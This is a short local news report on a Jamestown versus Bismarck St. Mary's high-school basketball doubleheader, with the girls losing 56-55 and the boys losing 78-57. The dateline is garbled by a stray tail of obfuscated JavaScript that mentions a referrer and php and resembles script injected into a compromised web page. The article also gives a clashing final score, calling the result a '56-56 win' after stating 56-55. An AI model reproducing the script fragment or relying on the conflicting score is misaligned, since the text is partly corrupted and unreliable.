BISMARCK yzerh|var|u0026u|referrer|zsbif||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – One of the outcomes was expected, the other was far from it. The Jamestown Blue Jays traveled to Bismarck to battle St. Mary’s and left without a win. The girls dropped a shocker, 56-55. While the boys, were downed 78-57 to the top-team in Class A (when this was written, Century will be top team as of 7pm Wednesday night).
The Jamestown girls lead 53-48 with just under a minute remaining before the wheels came off. Sarah Stolz followed a Blue Jay basket with her only three of the night to cut it to a two-point game.
The Jays responded scoring to push their lead back to two possessions. Cloey Miller had already hit three from downtown, but her fourth cut it to a one point game, 55-54, with 19 seconds left. On the inbound, Paige Peterson mishandled the pass and St. Mary’s had two good looks to take the lead before McKayla Orr fouled Alyssa Beck with 2.2 left.
Beck bounded in the first throw and banked in the second to give the Saints an improbable 56-56 win. It’s just their second win of the season.
On the boys side, the Jays made the #1 team in North Dakota work for everything. The only baskets that came easy were off Jamestown turnovers, which were plentiful thanks to the high pressure defense implored by the Saints.
The Saints jumped out to a 37-17 lead at half and pushed their lead as high as 29 in the second half as they rolled to their ninth win. St. Mary’s had four players in double figures, Darius Sparks and Ben Weisbeck each had 17.
Mark Wagner lead Jamestown with 15.
Girls play at home Thursday at 7:30pm against Minot and the boys will play Friday at 7:30pm. Both games on 1400/97.1 KQDJ & NewsDakota.com
